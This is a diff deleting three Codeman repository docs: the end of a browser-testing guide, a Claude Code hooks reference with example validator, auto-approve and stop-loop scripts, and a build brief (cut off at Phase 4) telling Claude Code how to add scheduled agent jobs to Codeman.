agentBrowser('click ".help-btn"');
|
||||
await new Promise(r => setTimeout(r, 500));
|
||||
```
|
||||
|
||||
## Key DOM Selectors
|
||||
|
||||
For reference when writing browser tests:
|
||||
|
||||
```
|
||||
.btn-claude // Create Claude session button
|
||||
.btn-settings // Settings button
|
||||
.help-btn // Help button
|
||||
.session-tab // Session tabs
|
||||
.session-tab.active // Active session tab
|
||||
.xterm // Terminal container
|
||||
#helpModal // Help modal
|
||||
#appSettingsModal // Settings modal
|
||||
.modal-content // Modal content
|
||||
.modal-close // Modal close button
|
||||
.header-brand .logo // Logo text
|
||||
#versionDisplay // Version display
|
||||
#quickStartCase // Quick start dropdown
|
||||
```
|
||||
|
||||
## Recommendations by Use Case
|
||||
|
||||
| Use Case | Recommended Framework |
|
||||
|----------|----------------------|
|
||||
| CI/CD testing | Playwright |
|
||||
| Chrome-specific features | Puppeteer |
|
||||
| AI agent development | Agent-Browser |
|
||||
| Visual regression | Playwright |
|
||||
| Performance testing | Puppeteer |
|
||||
| Accessibility testing | Agent-Browser |
|
||||
| Cross-browser testing | Playwright |
|
||||
| Quick prototyping | Agent-Browser CLI |
|
||||
|
||||
## Dependencies
|
||||
|
||||
```json
|
||||
{
|
||||
"devDependencies": {
|
||||
"playwright": "^1.58.0",
|
||||
"puppeteer": "^24.36.0",
|
||||
"agent-browser": "^0.6.0"
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
Install browsers after npm install:
|
||||
```bash
|
||||
npx playwright install chromium
|
||||
```
|
||||
@@ -1,596 +0,0 @@
|
||||
# Claude Code Hooks Reference
|
||||
|
||||
> Official documentation for Claude Code hooks system, extracted from [code.claude.com](https://code.claude.com/docs/en/hooks).
|
||||
|
||||
**Last Updated**: 2026-01-24
|
||||
**Source**: [Claude Code Hooks Documentation](https://code.claude.com/docs/en/hooks)
|
||||
|
||||
---
|
||||
|
||||
## Overview
|
||||
|
||||
Hooks are automated scripts that execute at specific events during your Claude Code session. They allow you to:
|
||||
- Validate, modify, or block tool usage
|
||||
- Add context to prompts
|
||||
- Implement custom workflows
|
||||
- Control agent behavior
|
||||
|
||||
---
|
||||
|
||||
## Configuration
|
||||
|
||||
Hooks are configured in settings files:
|
||||
|
||||
| File | Scope |
|
||||
|------|-------|
|
||||
| `~/.claude/settings.json` | User (global) |
|
||||
| `.claude/settings.json` | Project |
|
||||
| `.claude/settings.local.json` | Local project (gitignored) |
|
||||
| Plugin hook files | Plugin-specific |
|
||||
|
||||
### Basic Structure
|
||||
|
||||
```json
|
||||
{
|
||||
"hooks": {
|
||||
"EventName": [
|
||||
{
|
||||
"matcher": "ToolPattern",
|
||||
"hooks": [
|
||||
{
|
||||
"type": "command",
|
||||
"command": "your-command-here"
|
||||
}
|
||||
]
|
||||
}
|
||||
]
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
**Key Fields**:
|
||||
- `matcher`: Pattern to match tool names (case-sensitive, supports regex like `Edit|Write` or `*` for all)
|
||||
- `type`: `"command"` for bash or `"prompt"` for LLM-based evaluation
|
||||
- `command`: Bash command to execute
|
||||
- `prompt`: LLM prompt for evaluation (prompt-based hooks only)
|
||||
- `timeout`: Optional timeout in seconds (default: 60)
|
||||
|
||||
---
|
||||
|
||||
## Hook Events
|
||||
|
||||
### PreToolUse
|
||||
|
||||
**When**: After Claude creates tool parameters, before processing the tool call.
|
||||
|
||||
**Use Cases**: Approval, denial, or modification of tool calls.
|
||||
|
||||
**Common Matchers**:
|
||||
- `Bash` - Shell commands
|
||||
- `Write` - File writing
|
||||
- `Edit` - File editing
|
||||
- `Read` - File reading
|
||||
- `Task` - Subagent tasks
|
||||
- `WebFetch`, `WebSearch` - Web operations
|
||||
- `mcp__<server>__<tool>` - MCP tools
|
||||
|
||||
**Output Control**:
|
||||
```json
|
||||
{
|
||||
"hookSpecificOutput": {
|
||||
"hookEventName": "PreToolUse",
|
||||
"permissionDecision": "allow|deny|ask",
|
||||
"permissionDecisionReason": "string",
|
||||
"updatedInput": {
|
||||
"field_to_modify": "new value"
|
||||
},
|
||||
"additionalContext": "Context for Claude"
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### PermissionRequest
|
||||
|
||||
**When**: When the user is shown a permission dialog.
|
||||
|
||||
**Use Cases**: Auto-approve or deny permissions.
|
||||
|
||||
**Output Control**:
|
||||
```json
|
||||
{
|
||||
"hookSpecificOutput": {
|
||||
"hookEventName": "PermissionRequest",
|
||||
"decision": {
|
||||
"behavior": "allow|deny",
|
||||
"updatedInput": { },
|
||||
"message": "deny reason",
|
||||
"interrupt": false
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### PostToolUse
|
||||
|
||||
**When**: Immediately after a tool completes successfully.
|
||||
|
||||
**Use Cases**: Provide feedback, run formatters/linters, log operations.
|
||||
|
||||
**Output Control**:
|
||||
```json
|
||||
{
|
||||
"decision": "block",
|
||||
"reason": "Explanation",
|
||||
"hookSpecificOutput": {
|
||||
"hookEventName": "PostToolUse",
|
||||
"additionalContext": "Additional information"
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### Notification
|
||||
|
||||
**When**: When Claude Code sends notifications.
|
||||
|
||||
**Matchers**:
|
||||
- `permission_prompt`
|
||||
- `idle_prompt`
|
||||
- `auth_success`
|
||||
- `elicitation_dialog`
|
||||
|
||||
### UserPromptSubmit
|
||||
|
||||
**When**: When the user submits a prompt, before Claude processes it.
|
||||
|
||||
**Use Cases**: Add context, validate, or block prompts.
|
||||
|
||||
**Output Control**:
|
||||
```json
|
||||
{
|
||||
"decision": "block",
|
||||
"reason": "Explanation",
|
||||
"hookSpecificOutput": {
|
||||
"hookEventName": "UserPromptSubmit",
|
||||
"additionalContext": "My additional context"
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### Stop
|
||||
|
||||
**When**: When the main Claude Code agent finishes responding.
|
||||
|
||||
**Important**: Does NOT run on user interrupt.
|
||||
|
||||
**Use Cases**: **Ralph Wiggum loops** - block exit and refeed prompt.
|
||||
|
||||
**Output Control**:
|
||||
```json
|
||||
{
|
||||
"decision": "block",
|
||||
"reason": "Must provide when blocking"
|
||||
}
|
||||
```
|
||||
|
||||
Or to allow exit:
|
||||
```json
|
||||
{
|
||||
"continue": true,
|
||||
"stopReason": "optional message"
|
||||
}
|
||||
```
|
||||
|
||||
**Note**: For Stop events, `"continue": false` takes precedence over `"decision": "block"`.
|
||||
|
||||
### SubagentStop
|
||||
|
||||
**When**: When a subagent (Task tool call) finishes responding.
|
||||
|
||||
**Use Cases**: Control nested loops, verify subagent output.
|
||||
|
||||
### PreCompact
|
||||
|
||||
**When**: Before a compact operation.
|
||||
|
||||
**Matchers**:
|
||||
- `manual` - Invoked from `/compact`
|
||||
- `auto` - Invoked from auto-compact
|
||||
|
||||
### SessionStart
|
||||
|
||||
**When**: When Claude Code starts or resumes a session.
|
||||
|
||||
**Matchers**:
|
||||
- `startup` - Fresh start
|
||||
- `resume` - From `--resume`, `--continue`, or `/resume`
|
||||
- `clear` - From `/clear`
|
||||
- `compact` - From auto or manual compact
|
||||
|
||||
**Use Cases**: Load development context, set environment variables.
|
||||
|
||||
**Persisting Environment Variables**:
|
||||
```bash
|
||||
#!/bin/bash
|
||||
if [ -n "$CLAUDE_ENV_FILE" ]; then
|
||||
echo 'export NODE_ENV=production' >> "$CLAUDE_ENV_FILE"
|
||||
echo 'export API_KEY=your-api-key' >> "$CLAUDE_ENV_FILE"
|
||||
fi
|
||||
exit 0
|
||||
```
|
||||
|
||||
**Output Control**:
|
||||
```json
|
||||
{
|
||||
"hookSpecificOutput": {
|
||||
"hookEventName": "SessionStart",
|
||||
"additionalContext": "Context to load"
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### SessionEnd
|
||||
|
||||
**When**: When a session ends.
|
||||
|
||||
**Reason Values**:
|
||||
- `clear`
|
||||
- `logout`
|
||||
- `prompt_input_exit`
|
||||
- `other`
|
||||
|
||||
**Use Cases**: Cleanup tasks, logging.
|
||||
|
||||
---
|
||||
|
||||
## Hook Input
|
||||
|
||||
Hooks receive JSON via stdin with common fields:
|
||||
|
||||
```json
|
||||
{
|
||||
"session_id": "abc123",
|
||||
"transcript_path": "/path/to/transcript.jsonl",
|
||||
"cwd": "/current/directory",
|
||||
"permission_mode": "default",
|
||||
"hook_event_name": "PreToolUse",
|
||||
"tool_name": "Bash",
|
||||
"tool_input": { },
|
||||
"tool_use_id": "toolu_01ABC123..."
|
||||
}
|
||||
```
|
||||
|
||||
### Tool-Specific Input
|
||||
|
||||
**Bash**:
|
||||
```json
|
||||
{
|
||||
"tool_name": "Bash",
|
||||
"tool_input": {
|
||||
"command": "psql -c 'SELECT * FROM users'",
|
||||
"description": "Query the users table",
|
||||
"timeout": 120000
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
**Write**:
|
||||
```json
|
||||
{
|
||||
"tool_name": "Write",
|
||||
"tool_input": {
|
||||
"file_path": "/path/to/file.txt",
|
||||
"content": "file content"
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
**Edit**:
|
||||
```json
|
||||
{
|
||||
"tool_name": "Edit",
|
||||
"tool_input": {
|
||||
"file_path": "/path/to/file.txt",
|
||||
"old_string": "original text",
|
||||
"new_string": "replacement text"
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Hook Output
|
||||
|
||||
### Exit Codes
|
||||
|
||||
| Code | Behavior |
|
||||
|------|----------|
|
||||
| 0 | Success. `stdout` processed (shown in verbose or added as context) |
|
||||
| 2 | Blocking error. Only `stderr` used. Blocks tool/prompt based on event |
|
||||
| Other | Non-blocking error. `stderr` shown in verbose, execution continues |
|
||||
|
||||
### JSON Output (Exit Code 0)
|
||||
|
||||
```json
|
||||
{
|
||||
"continue": true,
|
||||
"stopReason": "optional message",
|
||||
"suppressOutput": true,
|
||||
"systemMessage": "optional warning"
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Prompt-Based Hooks
|
||||
|
||||
For Stop and SubagentStop events, you can use LLM-based evaluation:
|
||||
|
||||
```json
|
||||
{
|
||||
"hooks": {
|
||||
"Stop": [
|
||||
{
|
||||
"hooks": [
|
||||
{
|
||||
"type": "prompt",
|
||||
"prompt": "Should Claude stop? Context: $ARGUMENTS\n\nCheck if all tasks are complete.",
|
||||
"timeout": 30
|
||||
}
|
||||
]
|
||||
}
|
||||
]
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
**LLM Response Format**:
|
||||
```json
|
||||
{
|
||||
"ok": true,
|
||||
"reason": "Explanation when ok is false"
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Component-Scoped Hooks
|
||||
|
||||
Hooks can be defined in Skills, Agents, and Slash Commands using frontmatter:
|
||||
|
||||
```markdown
|
||||
---
|
||||
name: secure-operations
|
||||
hooks:
|
||||
PreToolUse:
|
||||
- matcher: "Bash"
|
||||
hooks:
|
||||
- type: command
|
||||
command: "./scripts/security-check.sh"
|
||||
---
|
||||
```
|
||||
|
||||
These hooks:
|
||||
- Are scoped to the component's lifecycle
|
||||
- Only run when that component is active
|
||||
- Support: PreToolUse, PostToolUse, Stop
|
||||
|
||||
---
|
||||
|
||||
## MCP Tools
|
||||
|
||||
MCP tools follow the pattern `mcp__<server>__<tool>`:
|
||||
|
||||
```json
|
||||
{
|
||||
"hooks": {
|
||||
"PreToolUse": [
|
||||
{
|
||||
"matcher": "mcp__memory__.*",
|
||||
"hooks": [
|
||||
{
|
||||
"type": "command",
|
||||
"command": "echo 'Memory operation' >> ~/mcp.log"
|
||||
}
|
||||
]
|
||||
},
|
||||
{
|
||||
"matcher": "mcp__.*__write.*",
|
||||
"hooks": [
|
||||
{
|
||||
"type": "command",
|
||||
"command": "/home/user/scripts/validate-mcp-write.py"
|
||||
}
|
||||
]
|
||||
}
|
||||
]
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Examples
|
||||
|
||||
### Bash Command Validation
|
||||
|
||||
```python
|
||||
#!/usr/bin/env python3
|
||||
import json
|
||||
import re
|
||||
import sys
|
||||
|
||||
VALIDATION_RULES = [
|
||||
(r"\bgrep\b(?!.*\|)", "Use 'rg' instead of 'grep'"),
|
||||
(r"\bfind\s+\S+\s+-name\b", "Use 'rg --files' instead of 'find -name'"),
|
||||
]
|
||||
|
||||
try:
|
||||
input_data = json.load(sys.stdin)
|
||||
except json.JSONDecodeError as e:
|
||||
print(f"Error: {e}", file=sys.stderr)
|
||||
sys.exit(1)
|
||||
|
||||
tool_name = input_data.get("tool_name", "")
|
||||
tool_input = input_data.get("tool_input", {})
|
||||
command = tool_input.get("command", "")
|
||||
|
||||
if tool_name != "Bash" or not command:
|
||||
sys.exit(1)
|
||||
|
||||
issues = []
|
||||
for pattern, message in VALIDATION_RULES:
|
||||
if re.search(pattern, command):
|
||||
issues.append(message)
|
||||
|
||||
if issues:
|
||||
for message in issues:
|
||||
print(f"- {message}", file=sys.stderr)
|
||||
sys.exit(2)
|
||||
```
|
||||
|
||||
### Auto-Approve Documentation Reads
|
||||
|
||||
```python
|
||||
#!/usr/bin/env python3
|
||||
import json
|
||||
import sys
|
||||
|
||||
try:
|
||||
input_data = json.load(sys.stdin)
|
||||
except json.JSONDecodeError as e:
|
||||
print(f"Error: {e}", file=sys.stderr)
|
||||
sys.exit(1)
|
||||
|
||||
tool_name = input_data.get("tool_name", "")
|
||||
tool_input = input_data.get("tool_input", {})
|
||||
|
||||
if tool_name == "Read":
|
||||
file_path = tool_input.get("file_path", "")
|
||||
if file_path.endswith((".md", ".mdx", ".txt", ".json")):
|
||||
output = {
|
||||
"hookSpecificOutput": {
|
||||
"hookEventName": "PreToolUse",
|
||||
"permissionDecision": "allow",
|
||||
"permissionDecisionReason": "Documentation file auto-approved"
|
||||
},
|
||||
"suppressOutput": True
|
||||
}
|
||||
print(json.dumps(output))
|
||||
sys.exit(0)
|
||||
|
||||
sys.exit(0)
|
||||
```
|
||||
|
||||
### Post-Write Formatter
|
||||
|
||||
```json
|
||||
{
|
||||
"hooks": {
|
||||
"PostToolUse": [
|
||||
{
|
||||
"matcher": "Edit|Write",
|
||||
"hooks": [
|
||||
{
|
||||
"type": "command",
|
||||
"command": "npx prettier --write \"$TOOL_INPUT_FILE_PATH\" 2>/dev/null || true"
|
||||
}
|
||||
]
|
||||
}
|
||||
]
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### Ralph Wiggum Stop Hook
|
||||
|
||||
```bash
|
||||
#!/bin/bash
|
||||
# ralph-stop-hook.sh
|
||||
|
||||
STATE_FILE=".claude/ralph-loop.local.md"
|
||||
|
||||
# Check if state file exists
|
||||
if [ ! -f "$STATE_FILE" ]; then
|
||||
exit 0 # No active loop, allow exit
|
||||
fi
|
||||
|
||||
# Read state from YAML frontmatter
|
||||
ENABLED=$(grep -m1 "^enabled:" "$STATE_FILE" | cut -d' ' -f2)
|
||||
ITERATION=$(grep -m1 "^iteration:" "$STATE_FILE" | cut -d' ' -f2)
|
||||
MAX_ITER=$(grep -m1 "^max-iterations:" "$STATE_FILE" | cut -d' ' -f2)
|
||||
PROMISE=$(grep -m1 "^completion-promise:" "$STATE_FILE" | cut -d' ' -f2-)
|
||||
|
||||
# Check if disabled
|
||||
if [ "$ENABLED" = "false" ]; then
|
||||
exit 0
|
||||
fi
|
||||
|
||||
# Check max iterations
|
||||
if [ -n "$MAX_ITER" ] && [ "$ITERATION" -ge "$MAX_ITER" ]; then
|
||||
exit 0
|
||||
fi
|
||||
|
||||
# Check for completion promise in output
|
||||
if [ -n "$PROMISE" ]; then
|
||||
if echo "$CLAUDE_OUTPUT" | grep -q "<promise>$PROMISE</promise>"; then
|
||||
exit 0
|
||||
fi
|
||||
fi
|
||||
|
||||
# Block exit, increment iteration
|
||||
NEW_ITER=$((ITERATION + 1))
|
||||
sed -i "s/^iteration:.*/iteration: $NEW_ITER/" "$STATE_FILE"
|
||||
|
||||
# Output block decision
|
||||
echo '{"decision": "block", "reason": "Completion promise not found. Iteration '"$NEW_ITER"'."}'
|
||||
exit 0
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Environment Variables
|
||||
|
||||
| Variable | Description |
|
||||
|----------|-------------|
|
||||
| `CLAUDE_PROJECT_DIR` | Project root directory |
|
||||
| `CLAUDE_CODE_REMOTE` | `"true"` for web, empty for CLI |
|
||||
| `CLAUDE_ENV_FILE` | Path to write persistent env vars (SessionStart) |
|
||||
|
||||
---
|
||||
|
||||
## Debugging
|
||||
|
||||
Use `claude --debug` to see detailed hook execution:
|
||||
|
||||
```
|
||||
[DEBUG] Executing hooks for PostToolUse:Write
|
||||
[DEBUG] Found 1 hook matchers in settings
|
||||
[DEBUG] Matched 1 hooks for query "Write"
|
||||
[DEBUG] Executing hook command: <command> with timeout 60000ms
|
||||
[DEBUG] Hook command completed with status 0: <stdout>
|
||||
```
|
||||
|
||||
Use `/hooks` command to view registered hooks and make changes.
|
||||
|
||||
---
|
||||
|
||||
## Execution Details
|
||||
|
||||
- **Timeout**: 60-second default per hook, configurable
|
||||
- **Parallelization**: All matching hooks run in parallel
|
||||
- **Deduplication**: Identical commands deduplicated automatically
|
||||
- **Matchers**: Only apply to tool-based hooks (PreToolUse, PostToolUse, PostToolUseFailure, PermissionRequest)
|
||||
|
||||
---
|
||||
|
||||
## Security Best Practices
|
||||
|
||||
1. **Validate and sanitize inputs** - Never trust input data blindly
|
||||
2. **Always quote shell variables** - Use `"$VAR"` not `$VAR`
|
||||
3. **Block path traversal** - Check for `..` in file paths
|
||||
4. **Use absolute paths** - Specify full paths for scripts (use `$CLAUDE_PROJECT_DIR`)
|
||||
5. **Skip sensitive files** - Avoid `.env`, `.git/`, keys, etc.
|
||||
|
||||
---
|
||||
|
||||
*Source: [Claude Code Hooks Documentation](https://code.claude.com/docs/en/hooks)*
|
||||
@@ -1,588 +0,0 @@
|
||||
# Claude Code Build Brief: Add Scheduling to Codeman
|
||||
|
||||
## 0. Purpose of This Brief
|
||||
|
||||
You are Claude Code working inside the Codeman repository.
|
||||
|
||||
Your task is to add a **small, reliable scheduling layer** to Codeman while preserving Codeman's existing architecture and session-management behavior.
|
||||
|
||||
This is not a greenfield rewrite. This is not a full product rebuild. This is a focused extension.
|
||||
|
||||
The target user wants Codeman-like tmux/web/session management, but with first-class scheduled jobs for Claude, Codex, OpenCode, Terminal, or any other configurable coding-agent harness.
|
||||
|
||||
---
|
||||
|
||||
## 1. Non-Negotiable Goal
|
||||
|
||||
Add scheduling to Codeman so a user can define a scheduled coding-agent job that:
|
||||
|
||||
1. Has a name.
|
||||
2. Uses an existing Codeman-supported agent/session type where possible.
|
||||
3. Has a working directory.
|
||||
4. Has a prompt or prompt file.
|
||||
5. Has a schedule.
|
||||
6. Can be enabled or disabled.
|
||||
7. Can be manually run now.
|
||||
8. When due, creates a Codeman/tmux session.
|
||||
9. Sends the configured prompt into that session.
|
||||
10. Records last run, next run, status, and run history.
|
||||
|
||||
The first working version should prioritize **scheduling correctness and reuse of Codeman's existing tmux/session system** over UI polish.
|
||||
|
||||
---
|
||||
|
||||
## 2. Core Architectural Rule
|
||||
|
||||
Do **not** rebuild Codeman's session layer.
|
||||
|
||||
Reuse existing Codeman functionality for:
|
||||
|
||||
- Creating sessions.
|
||||
- Naming sessions.
|
||||
- Launching Claude/Codex/OpenCode/Terminal sessions.
|
||||
- Sending input into sessions.
|
||||
- Displaying sessions in the web UI.
|
||||
- Killing sessions.
|
||||
- Tracking session status if already supported.
|
||||
|
||||
If an internal API/service/function already exists, reuse it.
|
||||
|
||||
If no reusable function exists, create a thin wrapper around the existing implementation rather than duplicating logic.
|
||||
|
||||
---
|
||||
|
||||
## 3. Product Boundary
|
||||
|
||||
This build is **Codeman + Scheduler**.
|
||||
|
||||
It is not yet:
|
||||
|
||||
- A full quota engine.
|
||||
- A full lock manager.
|
||||
- A replacement for Codeman's terminal UI.
|
||||
- A new FastAPI application.
|
||||
- A multi-tenant SaaS platform.
|
||||
- A complex cron-management product.
|
||||
- A full agent autonomy framework.
|
||||
|
||||
Keep the build small and shippable.
|
||||
|
||||
---
|
||||
|
||||
## 4. Required Working Scope for v0.1
|
||||
|
||||
Implement the following minimum features.
|
||||
|
||||
### 4.1 Scheduled Jobs List
|
||||
|
||||
Create a UI page showing all scheduled jobs.
|
||||
|
||||
Each row/card should show:
|
||||
|
||||
- Job name.
|
||||
- Agent/session type.
|
||||
- Working directory.
|
||||
- Schedule type.
|
||||
- Enabled/disabled state.
|
||||
- Last run time.
|
||||
- Next run time.
|
||||
- Last run status.
|
||||
- Actions:
|
||||
- Run Now.
|
||||
- Enable/Disable.
|
||||
- Edit.
|
||||
- Delete.
|
||||
|
||||
### 4.2 Create/Edit Scheduled Job
|
||||
|
||||
Create a form for scheduled jobs with these fields:
|
||||
|
||||
- `name`
|
||||
- `agent_type`
|
||||
- Reuse Codeman's existing session/agent types where possible.
|
||||
- Include at least Terminal/custom command if supported.
|
||||
- `working_directory`
|
||||
- `launch_command` if needed by Codeman's model.
|
||||
- `prompt_mode`
|
||||
- `inline_text`
|
||||
- `prompt_file_path`
|
||||
- `prompt_text`
|
||||
- `prompt_file_path`
|
||||
- `input_mode`
|
||||
- `paste`
|
||||
- `typed`
|
||||
- `schedule_type`
|
||||
- `once`
|
||||
- `interval_minutes`
|
||||
- `daily_time`
|
||||
- `weekly_time`
|
||||
- `run_at` for one-time jobs.
|
||||
- `interval_minutes` for interval jobs.
|
||||
- `daily_time` for daily jobs.
|
||||
- `weekly_days` and `weekly_time` for weekly jobs.
|
||||
- `enabled`
|
||||
- `notes` optional.
|
||||
|
||||
Do not build a complex visual cron editor in v0.1.
|
||||
|
||||
### 4.3 Run Now
|
||||
|
||||
Every scheduled job must support a `Run Now` action.
|
||||
|
||||
Run Now should:
|
||||
|
||||
1. Create a new session through Codeman's existing session creation logic.
|
||||
2. Send the configured prompt into the session using Codeman's existing input mechanism.
|
||||
3. Create a run-history record.
|
||||
4. Update last-run fields.
|
||||
5. Redirect or link the user to the created Codeman session.
|
||||
|
||||
### 4.4 Background Scheduler Loop
|
||||
|
||||
Add a small background scheduler loop that runs inside the Codeman backend process.
|
||||
|
||||
The loop should:
|
||||
|
||||
1. Wake every 15-60 seconds.
|
||||
2. Load enabled schedules.
|
||||
3. Find schedules where `next_run_at <= now`.
|
||||
4. Create a scheduled run.
|
||||
5. Launch the session using existing Codeman session logic.
|
||||
6. Send the prompt.
|
||||
7. Record run history.
|
||||
8. Compute the next run time.
|
||||
9. Avoid duplicate launches if the loop overlaps or restarts.
|
||||
|
||||
Keep this simple and robust.
|
||||
|
||||
### 4.5 Run History
|
||||
|
||||
Every scheduled execution should create a run-history record.
|
||||
|
||||
Track:
|
||||
|
||||
- `id`
|
||||
- `scheduled_job_id`
|
||||
- `session_id` or Codeman session reference.
|
||||
- `session_name` if applicable.
|
||||
- `started_at`
|
||||
- `finished_at` optional.
|
||||
- `status`
|
||||
- `created`
|
||||
- `session_started`
|
||||
- `prompt_sent`
|
||||
- `failed`
|
||||
- `error_message` optional.
|
||||
- `trigger_type`
|
||||
- `scheduled`
|
||||
- `manual_run_now`
|
||||
- `created_session_url` or route reference if easy.
|
||||
|
||||
---
|
||||
|
||||
## 5. Scheduling Rules
|
||||
|
||||
### 5.1 Once
|
||||
|
||||
Run at a specific date/time.
|
||||
|
||||
After successful launch:
|
||||
|
||||
- Set `enabled = false`, or mark as completed.
|
||||
|
||||
### 5.2 Interval
|
||||
|
||||
Run every N minutes.
|
||||
|
||||
Example:
|
||||
|
||||
- Every 60 minutes.
|
||||
- Every 240 minutes.
|
||||
|
||||
After launch:
|
||||
|
||||
- `next_run_at = now + interval_minutes`.
|
||||
|
||||
### 5.3 Daily
|
||||
|
||||
Run every day at HH:MM.
|
||||
|
||||
After launch:
|
||||
|
||||
- Compute the next occurrence of HH:MM after now.
|
||||
|
||||
### 5.4 Weekly
|
||||
|
||||
Run on selected weekdays at HH:MM.
|
||||
|
||||
After launch:
|
||||
|
||||
- Compute the next selected weekday/time after now.
|
||||
|
||||
### 5.5 Timezone
|
||||
|
||||
Use the server's local timezone for v0.1 unless Codeman already has timezone handling.
|
||||
|
||||
Add a visible note in the UI:
|
||||
|
||||
> Times use the server's local timezone.
|
||||
|
||||
Do not overbuild timezone support in v0.1.
|
||||
|
||||
---
|
||||
|
||||
## 6. Data Storage Decision
|
||||
|
||||
First inspect Codeman's existing persistence model.
|
||||
|
||||
If Codeman already has a database or persistence layer:
|
||||
|
||||
- Reuse it.
|
||||
- Add scheduled job and scheduled run models/tables/records using the existing pattern.
|
||||
|
||||
If Codeman uses files or JSON state:
|
||||
|
||||
- Use the same style for v0.1.
|
||||
- Prefer simple persistence over introducing a heavy new dependency.
|
||||
|
||||
If there is no appropriate persistence layer:
|
||||
|
||||
- Add SQLite only if it fits the codebase cleanly.
|
||||
- Otherwise use a JSON file store for the first version.
|
||||
|
||||
Do not introduce Postgres, Redis, Celery, or a separate scheduler service.
|
||||
|
||||
---
|
||||
|
||||
## 7. Concurrency and Duplicate-Run Guard
|
||||
|
||||
Implement a basic duplicate-run guard.
|
||||
|
||||
A schedule should not launch twice for the same due time.
|
||||
|
||||
Minimum acceptable approach:
|
||||
|
||||
- Before launching, create/update a run record with a `created` or `launching` state.
|
||||
- Use a schedule-level `last_triggered_at` or `last_due_key` to avoid double launching.
|
||||
- If launch fails, record failure clearly.
|
||||
|
||||
Do not build distributed locks. Codeman is expected to be local/single-instance for v0.1.
|
||||
|
||||
---
|
||||
|
||||
## 8. Multi-Session Warning
|
||||
|
||||
When the user clicks `Run Now`, show a warning if there are already active sessions for the same agent type.
|
||||
|
||||
Minimum behavior:
|
||||
|
||||
- If active sessions exist, show a confirmation warning.
|
||||
- User can continue anyway.
|
||||
|
||||
For scheduled automatic runs:
|
||||
|
||||
- Add a setting on the scheduled job:
|
||||
- `warn_only`
|
||||
- `skip_if_same_agent_running`
|
||||
|
||||
Default:
|
||||
|
||||
- `warn_only` for manual runs.
|
||||
- `skip_if_same_agent_running = false` for automatic runs unless easy to implement.
|
||||
|
||||
Do not build a complete quota engine in v0.1.
|
||||
|
||||
---
|
||||
|
||||
## 9. Prompt Sending Rules
|
||||
|
||||
The scheduler must support sending the configured prompt into the created session.
|
||||
|
||||
Prompt source:
|
||||
|
||||
1. Inline prompt text.
|
||||
2. Prompt file path.
|
||||
|
||||
Input mode:
|
||||
|
||||
1. Paste mode.
|
||||
2. Typed mode.
|
||||
|
||||
If only one input mode is easy with Codeman's current internals, implement that first and structure the code so the other can be added later.
|
||||
|
||||
Important:
|
||||
|
||||
- Do not send prompts to a session if session creation failed.
|
||||
- Record prompt-send success/failure in run history.
|
||||
- Save enough metadata to understand what prompt was used.
|
||||
|
||||
---
|
||||
|
||||
## 10. UI Bifurcation
|
||||
|
||||
Keep UI changes cleanly separated.
|
||||
|
||||
Add scheduler UI under a clear navigation item:
|
||||
|
||||
- `Scheduled Jobs`
|
||||
|
||||
Do not clutter the existing session dashboard.
|
||||
|
||||
The existing session dashboard may show sessions created by scheduled jobs, but the scheduling controls should live in their own section.
|
||||
|
||||
Recommended pages/routes:
|
||||
|
||||
- `/schedules`
|
||||
- `/schedules/new`
|
||||
- `/schedules/:id`
|
||||
- `/schedules/:id/edit`
|
||||
- `/schedules/:id/run-now`
|
||||
- `/schedules/:id/enable`
|
||||
- `/schedules/:id/disable`
|
||||
- `/schedules/:id/delete`
|
||||
|
||||
Use Codeman's existing frontend conventions and routing style.
|
||||
|
||||
---
|
||||
|
||||
## 11. Backend Bifurcation
|
||||
|
||||
Keep scheduler code separate from existing session code.
|
||||
|
||||
Recommended logical modules, adapted to Codeman's actual structure:
|
||||
|
||||
- `scheduler/model` or equivalent.
|
||||
- `scheduler/store` or equivalent.
|
||||
- `scheduler/service` for schedule calculations and launch logic.
|
||||
- `scheduler/loop` for the background due-job checker.
|
||||
- `scheduler/routes` for API/UI endpoints.
|
||||
- `scheduler/time` for next-run calculations.
|
||||
|
||||
Do not mix scheduling logic directly into terminal rendering, xterm handling, or low-level tmux code.
|
||||
|
||||
The scheduler service should call session services; it should not own tmux directly unless Codeman has no session abstraction.
|
||||
|
||||
---
|
||||
|
||||
## 12. Required Discovery Phase Before Coding
|
||||
|
||||
Before implementing, inspect the Codeman repo and produce a short architecture note in the terminal or in a file called:
|
||||
|
||||
`docs/cron-discovery.md`
|
||||
|
||||
This note must identify:
|
||||
|
||||
1. Where session creation happens.
|
||||
2. Where agent/session types are defined.
|
||||
3. Where input is sent into a session.
|
||||
4. Where active sessions are listed.
|
||||
5. Where session kill/delete is handled.
|
||||
6. How session state is stored.
|
||||
7. Whether there is existing persistence.
|
||||
8. Where backend routes live.
|
||||
9. Where frontend pages/components live.
|
||||
10. The smallest integration points for scheduling.
|
||||
|
||||
Do not start coding until this discovery is complete.
|
||||
|
||||
---
|
||||
|
||||
## 13. Implementation Phases
|
||||
|
||||
### Phase 1: Discovery
|
||||
|
||||
Deliverable:
|
||||
|
||||
- `docs/cron-discovery.md`
|
||||
|
||||
Must answer the 10 discovery questions above.
|
||||
|
||||
### Phase 2: Data Model / Persistence
|
||||
|
||||
Deliverable:
|
||||
|
||||
- Scheduled job persistence.
|
||||
- Scheduled run history persistence.
|
||||
- Basic create/read/update/delete operations.
|
||||
|
||||
### Phase 3: Scheduler Calculation Logic
|
||||
|
||||
Deliverable:
|
||||
|
||||
- Functions to compute `next_run_at` for:
|
||||
- once
|
||||
- interval
|
||||
- daily
|
||||
- weekly
|
||||
|
||||
Add tests if the repo has an existing test setup.
|
||||
|
||||
### Phase 4: Manual Run Now
|
||||
|
||||
Deliverable:
|
||||
|
||||
